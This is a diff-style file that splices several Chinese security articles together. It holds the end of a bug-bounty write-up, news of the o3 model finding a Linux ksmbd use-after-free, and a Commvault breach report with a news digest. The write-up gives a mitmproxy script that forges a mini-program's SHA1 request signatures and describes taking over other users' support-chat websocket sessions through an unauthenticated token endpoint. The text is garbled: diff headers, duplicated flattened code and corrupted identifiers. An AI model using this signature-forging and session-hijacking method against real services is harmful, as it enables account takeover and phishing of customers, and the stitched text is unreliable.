![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8tYd2xPkMwY0yQC5ScUD8GjSGcDvwbqD3UnSSKVGLw31eL35JykUxxQ/640?wx_fmt=png&from=appmsg "")
这里便可以看到动态传进来的值把拼接后的c复制出来
```
{"sessionId":"jS9NZxxx","encryptedData":"xxx","iv":"xxx"}tiixxx1728443242572
```
和最后发出去的数据包对比一下,
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgGEmAIoicg9F7vOOLVFEciaD3q1EstoKEqcshMW54y02jc8tYrjGahacQ/640?wx_fmt=png&from=appmsg "")
和最后发出去的数据包对比一下
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8ZickpCb3hrhmbNU8YpGVpibvWSTBEia4BG9FWcoYoMBXH5AoibZpIQvCBQ/640?wx_fmt=png&from=appmsg "")
很明显o是传入的data数据至此sign的算法分析完毕mitmproxy脚本也就直接可以写出来了代码有点渣能用就行
```
import datetime  import hashlib  from mitmproxy import ctx  import json  # 获取当前时间  now = datetime.datetime.now()  timestamp_ms_precise = int(now.timestamp() * 1000)  key="tiihxxxx=="defrequest(flow):# 获取请求对象      request = flow.request  # # 实例化输出类  # info = ctx.log.info    # # 打印请求的url    # info(request.url)    # # 打印请求方法    # info(request.method)    # # 打印host头    # info(request.host)    # # 打印请求端口    # info(str(request.port))    # # 打印所有请求头部    # info(str(request.headers))    # # 打印cookie头    # info(str(request.cookies))  if request.method == 'POST':          data=(request.get_text())  print(data)          n=data  #n = json.dumps(data).replace(": \"", ":\"")  print(n)          T = 1728192063292        c = n + key + str(T)  print(c)          encoded_data = c.encode('utf-8')  # 创建一个sha1哈希对象          sha1 = hashlib.sha1()  # 更新哈希对象可以多次调用update()来添加数据)          sha1.update(encoded\_data)  # 获取十六进制表示的哈希值          hex_digest = sha1.hexdigest()          Sign = hex_digest  print(Sign)          request.headers["Sign"] = Sign          request.headers["T"] = "1728192063292"else:          n=request.url  print(n)          T = 1728208280365        c=n + key + str(T)  print(c)          encoded_data = c.encode('utf-8')  # 创建一个sha1哈希对象          sha1 = hashlib.sha1()  # 更新哈希对象可以多次调用update()来添加数据)          sha1.update(encoded\_data)  # 获取十六进制表示的哈希值          hex_digest = sha1.hexdigest()          Sign = hex_digest  print(Sign)          request.headers["Sign"] = Sign          request.headers["T"] = "1728208280365"        request.headers["Requrl"] = n
import datetime  
import hashlib  
from mitmproxy import ctx  
import json  
# 获取当前时间  
now = datetime.datetime.now()  
timestamp_ms_precise = int(now.timestamp() * 1000)  
key="tiihxxxx=="  
def request(flow):  
    # 获取请求对象  
    request = flow.request  
    # # 实例化输出类  
    # info = ctx.log.info    # # 打印请求的url    # info(request.url)    # # 打印请求方法    # info(request.method)    # # 打印host头    # info(request.host)    # # 打印请求端口    # info(str(request.port))    # # 打印所有请求头部    # info(str(request.headers))    # # 打印cookie头    # info(str(request.cookies))  
    if request.method == 'POST':  
        data=(request.get_text())  
        print(data)  
        n=data  
        #n = json.dumps(data).replace(": \"", ":\"")  
        print(n)  
        T = 1728192063292  
        c = n + key + str(T)  
        print(c)  
        encoded_data = c.encode('utf-8')  
        # 创建一个sha1哈希对象  
        sha1 = hashlib.sha1()  
        # 更新哈希对象可以多次调用update()来添加数据)  
        sha1.update(encoded\_data)  
        # 获取十六进制表示的哈希值  
        hex_digest = sha1.hexdigest()  
        Sign = hex_digest  
        print(Sign)  
        request.headers["Sign"] = Sign  
        request.headers["T"] = "1728192063292"  
    else:  
        n=request.url  
        print(n)  
        T = 1728208280365  
        c=n + key + str(T)  
        print(c)  
        encoded_data = c.encode('utf-8')  
        # 创建一个sha1哈希对象  
        sha1 = hashlib.sha1()  
        # 更新哈希对象可以多次调用update()来添加数据)  
        sha1.update(encoded\_data)  
        # 获取十六进制表示的哈希值  
        hex_digest = sha1.hexdigest()  
        Sign = hex_digest  
        print(Sign)  
        request.headers["Sign"] = Sign  
        request.headers["T"] = "1728208280365"  
        request.headers["Requrl"] = n
```
## 接口分析(漏洞挖掘)
@ -204,26 +275,37 @@ import datetime  import hashlib  from mitmproxy import ctx  import json
在静态分析的源码中提取出来几十个接口,挨个进行测试
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgcBhBdynZnvWlE68VQer5E71I6vgTOhyVoGbejAJ1pMCcq8LBpxZC1A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B81ugcTxVtXjPqiaibx8Dq68PKe6wJksnmdwHnoOrbtyswOtYjS8jgIoIQ/640?wx_fmt=png&from=appmsg "")
经过多次测试发现该客服系统使用的websocket协议进行的聊天抓到的数据包如下
经过多次测试发现该客服系统使用的websocket协议进行的聊天抓到的数据包如下
```
GET /websocket?appId=mgb7xxx&token=juukgLAxxx&sdkVer=5.6.1&pid=&apiVer=normal&platform=MiniProgram&protocolVer=3 HTTP/1.1Host: wsproxy.xxx.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/8555Upgrade: websocketOrigin: https://wsproxy.xxx.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Sec-WebSocket-Key: Z7s5axxx==
GET /websocket?appId=mgb7xxx&token=juukgLAxxx&sdkVer=5.6.1&pid=&apiVer=normal&platform=MiniProgram&protocolVer=3 HTTP/1.1
Host: wsproxy.xxx.com
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/8555
Upgrade: websocket
Origin: https://wsproxy.xxx.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Sec-WebSocket-Key: Z7s5axxx==
```
这个数据包之后就会直接从http协议切换到websocket协议而这个数据包中的appId和token是由客户端直接发送给服务器的所以这两个值要么是js计算出来的要么是服务器返回的数据先搜一下前端的js代码发现appid是写死的
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgZibHuTJ1HHMib2xucF7pCrUzTu4oib7goEno0GTSz6xwQdEokW02PIVOw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8mk6n5KBN3GgNHDWkxTNyVJpoSn0Kiauuia3Y6tX7iblofhk0RHobtJ5icA/640?wx_fmt=png&from=appmsg "")
token在js中没有相关算法基本就可以确定是服务器返回的数据了在burp的proxy history中搜索token字符串看一下是哪个包返回的
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgVYty79Y7CjibeFpkbUcACvHiaWP38nthJhRkkM0t17AWB9kVyXV4IrWQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B87Cj4adBwEHc0W4o0REPdicgP4GpTfek803bPxMdYNDiawgnOWeW9VqDQ/640?wx_fmt=png&from=appmsg "")
找到了接口发送到repeater
尝试修改userid发现仍然会返回token说明这里没有身份验证可直接接管任意用户的聊天会话。写个python利用websocket库切入websocket会话成功接管会话内容。
![image.png](https://mmbiz.qpic.cn/sz_mmbiz_png/veA9QmcJk5kN8cLFf1JVIeKicbWG4qNTgeyjY9swa5Mj4GU7NecOcicnH0B9hYS04Qw8Tut9uXbkwBmFEic3Ipdiag/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9JPpNb7icHgGQU6LhOdfDYc9BQHHOb8B8o4RjMg8Ekc85m6OZgXJHicQPicBf4DxxTeiaMOiasBYVdQWjhBl9lWzQkQ/640?wx_fmt=png&from=appmsg "")
至此漏洞已成。顺带补充一下src中客服聊天系统的危害描述
@ -231,5 +313,7 @@ token在js中没有相关算法基本就可以确定是服务器返回的数
2、websocket无身份验证可冒充客服对客户发起钓鱼极大的损害企业形象。
最终,该漏洞给了严重。

View File

@ -0,0 +1,188 @@
# 首次利用OpenAI o3模型发现Linux内核零日漏洞 | Palo Alto公布千亿营收冲刺计划网络安全迈向平台化寡头竞争
e安在线 e安在线 2025-05-27 02:29
![](https://mmbiz.qpic.cn/sz_mmbiz_png/1Y08O57sHWiahTldalExhOyzXNMO6kcO7ULmiclhSZfg8zVMLHEMUGBu3lBjFbjib8vsYDZzplofMSC7epkHHWpibw/640?wx_fmt=png&from=appmsg "")
# 首次利用OpenAI o3模型发现Linux内核零日漏洞
AI成功找到Linux安全漏洞还是**内核级别的零日漏洞**
刚刚OpenAI总裁转发了独立研究员
Seen Heelan
的实验成果用o3模型找到了Linux内核SMB实现中的一个远程零日漏洞。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5ia6WxcUjgFP07Mtv1zoSByG6IicD7S8LXdFSy9cPXdSMVIxfCicvia92XWA/640?wx_fmt=jpeg "")
更让人惊讶的是,整个过程中**没有用到任何复杂的工具**
——没有脚手架、没有智能体框架、没有工具调用仅仅是o3 API本身。
这个漏洞被编号为CVE-2025-37899是SMB”注销”命令处理程序中的一个释放后使用use-after-free漏洞。
据作者透露,这是首次公开讨论的由大模型发现的此类漏洞。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iaLbLibIERGB87UO7iaEQjnLdMiaFbaoFdQBOUzfm9AU4KYFwiapLZzw1oYQ/640?wx_fmt=jpeg "")
有网友看过发现过程后感叹原以为会有很疯狂的实验设置但其实只是把一堆代码缝到一起让o3检查100次。
> 希望其他白帽黑客已经开始像这样检查其他关键操作系统了。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iacNtBcY8wpZIe7Xibm4gmdyeI1NQs7ZW6iaxWRiancV0lBtqzPib5OaUWzw/640?wx_fmt=jpeg "")
OpenAI首席研究官Mark Chen表示像o3这样的推理模型正开始助力深度技术工作和有意义的科学发现。接下来一年类似这样的成果将会越来越普遍
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iaRia4UAIlory3uykXq8FhaibBaxf4s3cU2ALemxsvLN6tOdMEicEAc8zEA/640?wx_fmt=jpeg "")
## AI不仅找到漏洞还能辅助修复
Sean Heelan是一位独立研究员专注于基于大模型的漏洞研究和漏洞利用自动化生成。
他原本在手动检查Linux内核的KSMBD内核态SMB3协议实现漏洞想要暂时远离大模型相关的工具开发。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iauKcWgev0b46yBu9SExsb30G2fMplrA7sTcPhN3ZcvficH65ztWAT7Ew/640?wx_fmt=jpeg "")
但o3发布后他忍不住想测试一下”既然我手里已经有这些漏洞不如看看o3能不能找到它们
他先用一个自己手动发现的漏洞CVE-2025-37778作为测试。这是Kerberos认证路径中的一个释放后使用漏洞是测试大模型能力很好的基准因为
- 它是Linux 内核远程攻击面的一部分
- 它并不简单,发现他需要理解如何触发特定的会话状态、认证函数的多条执行路径、跨函数的对象生命周期管理
- 但它也并非极其复杂作者本人可以在10分钟内带着同时了解涉及到的约3300行代码
接下来开始实验之前,还需要搞清楚一个问题,该给大模型展示哪些代码?
理想情况当然是大模型读取整个代码库并输出结果,但实践中上由于上下文窗口的限制还无法事先。
最终Heelan为 LLM 提供了“会话设置”命令处理程序的代码包括它调用的所有函数的代码等等直到调用深度达到3这是包含推理漏洞所需代码所需的深度还包含了命令处理器、连接建立/拆除、请求分发等完整上下文。
提示词中告诉o3专门寻找use-after-free漏洞提供KSMBD架构说明强调要避免误报每个实验运行100次统计成功率。
相关代码和提示词已开源在GitHub上。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iaPYicbhn7IK2cicX9Qznv4goI29Ip1NbLPt8fGxdYYz01yrXX49I2qSBQ/640?wx_fmt=jpeg "")
Heelan还按同样流程测试了Claude3.7和Claude 3.5作为对比结果o3的表现让人眼前一亮
- OpenAI o3: 100次运行中成功找到8次漏洞
- Claude 3.7: 100次中找到3次
- Claude 3.5: 100次中一次都没找到
此外有意思的的是o3和Claude的输出风格完全不同。
o3生成的像人类写的漏洞报告结构清晰、重点突出
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iavn9uVXMp5zamA3MicXzC0v3tjjfLD5FiatgjLELibsiccXsJgniaxzo3tuQ/640?wx_fmt=jpeg "")
Claude更像思维流或工作日志细节丰富但略显冗长。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5ian8PbTOI33SMgKJn9sZARm4gp423PpPf2m4qA84yzX6eI88Q1QEsMzg/640?wx_fmt=jpeg "")
接下来发生的事情更精彩了。
Heelan想测试o3在更大代码量下的表现于是给它提供了所有SMB命令处理程序的代码约**12000行**
代码。
虽然找到原始漏洞的成功率降到了1%性能明显下降。但在运行结果中o3报告了一个全新的漏洞。
Heelan自己之前也不知道这个漏洞它同样是由于sess->user的释放造成的但这次是在会话注销处理程序中。
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iaxW0LWA2W0e6LY6h7qf7f1icsyHWdIbRycszsBA1N3HzicEdcSjRE1bOA/640?wx_fmt=jpeg "")
o3自己对这个漏洞的解释如下。
> 当一个ksmbd工作线程还在执行使用sess->user的请求时另一个处理同一会话SMB2 LOGOFF的线程释放了该结构。没有同步机制保护该指针所以第一个线程会解引用已释放的内存——这是一个经典的释放后使用漏洞会导致内核内存损坏和任意代码执行。
更有意思的是研究员发现o3不仅能找到漏洞某些情况下修复方案比人类更完善。
对于之前的Kerberos认证漏洞Heelan最初提出的修复是简单地将指针置空
```
if (sess->state == SMB2_SESSION_VALID) {
    ksmbd_free_user(sess->user);
    sess->user = NULL;  // 添加这行
}
```
但o3的报告中有指出这个修复不够充分因为SMB协议允许两个不同的连接”绑定”到同一个会话在释放和置空之间的短暂窗口期另一个线程仍可能访问这个指针。
最终Heelan承认如果使用o3来找和修复原始漏洞“理论上”会比自己完成更好。
之所以加上“理论上”的限定是因为现在AI误报的比例有点高人类很难认真仔细地查看o3的每份报告。
不过他也认为随着技术的发展,这个比例只会越来越低。
Heelan在报告结尾感慨道
> 大模型在程序分析技术的能力空间中处于一个比我们见过的任何东西都更接近人类的位置。考虑到创造力、灵活性和通用性LLM更像是人类代码审计员而不是符号执行、抽象解释或模糊测试。
他特别强调,如果你从事安全研究工作,现在应该开始密切关注了:
- 专家级研究员不会被取代,反而会变得更高效
- 对于10000行以内的代码问题o3有相当大的概率能解决或帮助解决
- 虽然仍有约1:50的信噪比问题但这已经值得投入时间和精力
不过也有人看到了其中的风险:
如果坏人利用AI的能力找到类似的漏洞并攻击系统又如何呢
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWgVNceuZvO3oib6GbYo1AV5iaKicWYP1ficmTzOBJkc4qfqEp8WNUjbuAqfyx3Z4BujVaLq4eichLtTuag/640?wx_fmt=jpeg "")
#
# Palo Alto公布千亿营收冲刺计划网络安全迈向平台化寡头竞争
5月26日消息华尔街分析师表示Palo Alto Networks推动客户在其广泛的网络安全平台上整合工具的战略正在持续奏效。
在审阅该公司上周发布的最新季度财报后分析师们向投资者表示他们对Palo Alto Networks的“平台化”战略信心不断增强。
**平台化产品客户高速增长**
这家网络安全巨头披露2025财年第三季度截至4月30日其平台化客户总数约为1250家。美国投行TD Cowen的董事总经理兼高级分析师Shaul Eyal发布投资报告指出该季度新增约90笔平台化交易高于上一季度的75笔。
Eyal表示这种“平台化的加速”是Palo Alto Networks一年多前启动的新增长战略所展现出的多个积极信号之一。2024年2月公司首席执行官Nikesh Arora宣布对整体战略进行全面调整旨在推动客户更快速地实现平台整合。
Eyal在报告中写道在一定程度上得益于平台化的推进可以明显看出Palo Alto Networks朝着到2030财年实现150亿美元约合人民币1075亿元年经常性收入ARR目标的努力“依然坚定不移地沿着正确方向前进”。
Wedbush Securities董事总经理兼高级股票研究分析师Daniel Ives在投资者报告中指出从20日发布的季度财报来看Palo Alto Networks正在为其平台化战略迈入2026财年奠定基础而AI正处于这一战略的核心。
Ives写道“我们认为2025年将是该公司的过渡之年因为平台化交易与云端渗透正带来强劲的交易动能和更稳定的销售管道同时也让公司成为AI支出带来的主要受益者之一。”
**SIEM市场正迎来颠覆性替代机遇**
在公司20日的季度电话会议上Arora提到本季度的一些关键平台化成果包括与一家全球咨询公司达成的一项价值超过9000万美元的交易。他表示该交易使用Palo Alto Networks的Cortex XSIAM替代了一家“传统”的安全信息与事件管理SIEM提供商。
Arora指出这项平台化交易“通过整合4款产品降低了成本”同时也帮助客户“显著提升”了对安全事件的平均响应速度。
Cortex XSIAM是Palo Alto Networks推出的一款可替代传统SIEM产品的解决方案。根据Arora的说法该产品在本季度末的ARR同比增长高达200%,成为本季度的另一亮点。
他表示该产品的增长速度“几乎是我们最接近的下一代SIEM竞争对手的两倍”而目前XSIAM的总预订金额已接近10亿美元。
展望未来Arora预测传统SIEM市场将在几年内被“新时代玩家”所取代这些新兴企业通过AI和现代架构赋能安全运营团队。
他说“我认为在未来3到5年内传统SIEM将被彻底替代。”
**关税未对公司造成影响**
Palo Alto Networks首席财务官Dipak Golechha表示特朗普政府的关税政策至今尚未对Palo Alto Networks造成影响该公司是全球主要的硬件防火墙制造商之一。
他说,公司正将生产转移至德克萨斯州的一家合同制造工厂,并通过“在美国境内组装全部硬件”来实现与竞争对手的差异化。
Golechha表示“因此关税对我们业务的影响可以说是微乎其微。”
声明:除发布的文章无法追溯到作者并获得授权外,我们均会注明作者和文章来源。如涉及版权问题请及时联系我们,我们会在第一时间删改,谢谢!文章来源:
安全内参、
参考资料crn.com
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1Y08O57sHWiaM9uv5Q89hYMT8zuKQtQYuvSPy0HyyLwRShZOMcoGgoBy6qiatgDhW3UhCXGVXiaEbS8ANmZwViaMAw/640?wx_fmt=jpeg&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=wxpic "")

View File

@ -0,0 +1,207 @@
# 黑客利用 0day 漏洞通过 Commvault 入侵美国云平台
会杀毒的单反狗 军哥网络安全读报 2025-05-27 01:11
**导****读**
一场新的 SaaS 攻击活动已经到来 Commvault 位居榜首。
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaHjxGD6u56cVoOOcCGj6OkuHZ53OGTxzk6E0L1PjZ1pEibrfxLs0wDz6nibxVlUTYWwuMEkZ6ZtaBUQ/640?wx_fmt=webp&from=appmsg "")
Commvault 云基础设施遭受网络攻击,导致使用 M
icrosoft 365 备份通过 Metallic 未经授权访问客户数据。事件由 CISA 机构报告https://www.securitylab.ru/news/558834.php表明攻击者在 Microsoft Azure 云环境中开展活动。
据该机构称,攻击者能够访问敏感数据,特别是用于连接到 Microsoft 365 备份的客户机密。这些数据存储在 Commvault 的 Azure 环境中,很可能让攻击者渗透到许多客户公司的内部 M365 环境。
此次入侵影响了 Metallic 软件,即 Commvault 基于云的备份即服务 (SaaS) 解决方案。该机构指出,此次事件可能是针对 配置脆弱且默认访问权限过多的 云软件提供商的更大规模活动的一部分。
最初的可疑活动通知来自微软, 时间是 2025 年 2 月。根据 Commvault 自己的报告调查显示一个APT黑客组织利用了 该公司网络服务器中一个此前未知的漏洞(CVE-2025-3928 )。该漏洞允许经过身份验证的远程用户在服务器上运行 Web Shell。
Commvault 团队解释说,攻击者使用先进的技术来获取客户端用于与 M365 通信的敏感授权密钥。虽然该公司强调数据备份未受到影响,但一些凭证可能已被泄露。
为了应对这一事件Commvault 轮换了所有 M365 凭证并加强了对云中服务的控制。该公司继续与政府机构和工业合作伙伴合作,进一步分析情况。
专家们提出了一系列降低风险的措施:
- 监控 Entra审计日志 查找与Commvault 应用程序相关的凭据的未经授权的更改或添加;
- 分析 Microsoft 日志Entra 审计、Entra 登录、统一审计日志)并进行内部威胁搜寻;
- 对于单用户应用程序 - 实施条件访问策略,将 Commvault 服务组件的身份验证限制为受信任范围内的 IP 地址;
- 检查具有提升权限的 Entra 应用程序注册和服务主体列表;
- 仅将对 Commvault 管理接口的访问限制在受信任的网络;
- 配置 Web 应用程序防火墙以阻止路径遍历尝试和可疑文件下载,并删除对 Commvault 应用程序的外部访问。
这一事件凸显保护云基础设施的重要性以及及时应对威胁的必要性。
https://www.securitylab.ru/news/559706.php
新闻链接:
https://www.securitylab.ru/news/559706.php
![](https://mmbiz.qpic.cn/mmbiz_svg/McYMgia19V0WHlibFPFtGclHY120OMhgwDUwJeU5D8KY3nARGC1mBpGMlExuV3bibicibJqMzAHnDDlNa5SZaUeib46xSzdeKIzoJA/640?wx_fmt=svg "")
**今日安全资讯速递**
**APT事件**
Advanced Persistent Threat
黑客利用 0
d
ay 漏洞通过 Commvault 入侵美国云平台
https://www.securitylab.ru/news/559706.php
ViciousTrap 威胁组织利用思科漏洞用
5,300 台受感染设备构建全球蜜罐
https://thehackernews.com/2025/05/vicioustrap-uses-cisco-flaw-to-build.html
俄黑客组织 TAG-110 利用启用宏的 Word 文档攻击塔吉克斯坦
https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-tajikistan-with-macro-enabled
俄黑客组织 Killnet 以新身份回归
https://therecord.media/russian-hacker-group-killnet-returns-with-new-identity
APT
组织利用 Trimble Cityworks 的
0day
漏洞攻击美地方政府实体
https://www.securityweek.com/cityworks-zero-day-exploited-by-chinese-hackers-in-us-local-government-attacks/
APT
组织利用 Ivanti 漏洞攻击关键部门
https://www.securityweek.com/chinese-spies-exploit-ivanti-vulnerabilities-against-critical-sectors/
**一般威胁事件**
General Threat Incidents
玛莎百货预计勒索软件攻击将造成 4 亿美元损失
https://www.securityweek.com/marks-spencer-expects-ransomware-attack-to-cost-400-million/
加拿大新斯科舍电力公司确认遭受勒索软件攻击
https://www.securityweek.com/nova-scotia-power-confirms-ransomware-attack-280k-notified-of-data-breach/
Commvault 漏洞CVE-2025-3928遭利用
https://www.securityweek.com/companies-warned-of-commvault-vulnerability-exploitation/
SilverRAT 源代码在线泄露
https://hackread.com/silverrat-source-code-leaked-online-you-need-to-know/
假冒 DigiYatra 应用程序瞄准印度用户窃取财务数据
https://gbhackers.com/fake-digiyatra-apps-target-indian-users/
黑客在暗网论坛上出售超过 500 个被盗加密数据库
https://gbhackers.com/hackers-reportedly-selling-over-500-stolen-crypto-databases/
NPM 上的数十个恶意软件包收集主机和网络数据
https://www.bleepingcomputer.com/news/security/dozens-of-malicious-packages-on-npm-collect-host-and-network-data/
Katz Stealer 攻击 Chrome、Edge、Brave 和 Firefox 窃取登录信息
https://cybersecuritynews.com/katz-stealer-attacking-chrome-edge-brave-firefox/
超过 40 个恶意 Chrome 扩展程序冒充知名品牌窃取敏感数据
https://gbhackers.com/over-40-malicious-chrome-extensions/
FBI 披露 Silent Ransom 组织利用虚假 IT 支持电话攻击受害者
https://gbhackers.com/fbi-issues-on-silent-ransom-group/
**漏洞事件**
Vulnerability Incidents
Fortinet CVE-2025-32756 的 PoC
公开
https://hackread.com/researchers-poc-fortinet-cve-2025-32756-quick-patch/
硬编码 Telnet 凭证使 D-Link 路由器面临远程代码执行漏洞
https://cybersecuritynews.com/hard-coded-telnet-credentials-d-link-routers/
Meteobridge Web 界面漏洞可导致攻击者远程注入命令
https://gbhackers.com/meteobridge-web-interface-vulnerability/
三个 0Day 漏洞足以让 Versa Concerto 成为接管通信系统的工具
https://www.securitylab.ru/news/559711.php
vBulletin 论坛严重漏洞致使攻击者执行远程代码
https://cybersecuritynews.com/vbulletin-forum-rce-vulnerability/
Bitwarden PDF 文件处理程序漏洞使攻击者能够上传恶意 PDF 文件
https://cybersecuritynews.com/bitwarden-pdf-file-handler-vulnerability/
Tenable Network Monitor 漏洞可使攻击者提升权限
https://cybersecuritynews.com/tenable-network-monitor-vulnerabilities/
Apache Tomcat RCE 漏洞曝光PoC 发布
https://gbhackers.com/apache-tomcat-rce-vulnerability/
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "")
扫码关注
军哥网络安全读报
**讲述普通人能听懂的安全故事**

File diff suppressed because one or more lines are too long